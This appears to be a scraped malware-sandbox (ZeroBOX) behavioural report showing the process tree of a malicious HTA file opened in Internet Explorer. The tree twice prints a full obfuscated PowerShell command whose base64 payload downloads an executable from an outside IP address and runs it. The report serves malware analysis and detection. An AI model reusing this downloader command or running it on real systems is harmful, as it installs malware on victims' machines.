| ZeroBOX

iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\ieexplore.hta.html
2172
- iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2172 CREDAT:145409
  2252
  - cmd.exe "C:\Windows\system32\cmd.exe" "/c powErShElL.exE -eX bypasS -NOp -w 1 -C DeVicEcreDenTiALDEpLoymeNT.EXe ; IeX($(iEx('[SYsTeM.TeXT.enCodING]'+[chAr]58+[cHAr]0X3A+'uTF8.gEtSTRInG([syStEm.coNVErT]'+[cHaR]58+[Char]58+'FROMBASe64StRInG('+[chAR]0X22+'JEd4TyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1CRXJkZUZJbml0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVdk1hTHlrWSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlzVHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZZ0dHVmYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd3RwQXNhdCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG15VEZlbWNaQ3QpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYWhQQ3pCdkl5T3QiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRVNwQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIVHZkeUxpZkppUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEd4Tzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3Ni4xMzgvMzIvc2Fob3N0LmV4ZSIsIiRlTnY6QVBQREFUQVxzYWhvc3QuZXhlIiwwLDApO3NUYXJULXNsRUVQKDMpO1NUYXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXHNhaG9zdC5leGUi'+[CHaR]0x22+'))')))"
    1968
    - powershell.exe powErShElL.exE -eX bypasS -NOp -w 1 -C DeVicEcreDenTiALDEpLoymeNT.EXe ; IeX($(iEx('[SYsTeM.TeXT.enCodING]'+[chAr]58+[cHAr]0X3A+'uTF8.gEtSTRInG([syStEm.coNVErT]'+[cHaR]58+[Char]58+'FROMBASe64StRInG('+[chAR]0X22+'JEd4TyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1CRXJkZUZJbml0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVdk1hTHlrWSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlzVHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZZ0dHVmYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd3RwQXNhdCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG15VEZlbWNaQ3QpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYWhQQ3pCdkl5T3QiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRVNwQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIVHZkeUxpZkppUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEd4Tzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3Ni4xMzgvMzIvc2Fob3N0LmV4ZSIsIiRlTnY6QVBQREFUQVxzYWhvc3QuZXhlIiwwLDApO3NUYXJULXNsRUVQKDMpO1NUYXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXHNhaG9zdC5leGUi'+[CHaR]0x22+'))')))"
      2132
      - csc.exe "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\kh2-la8c.cmdline"
        2184
        
        cvtres.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RES3F81.tmp" "c:\Users\test22\AppData\Local\Temp\CSC3F12.tmp"
        1692

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents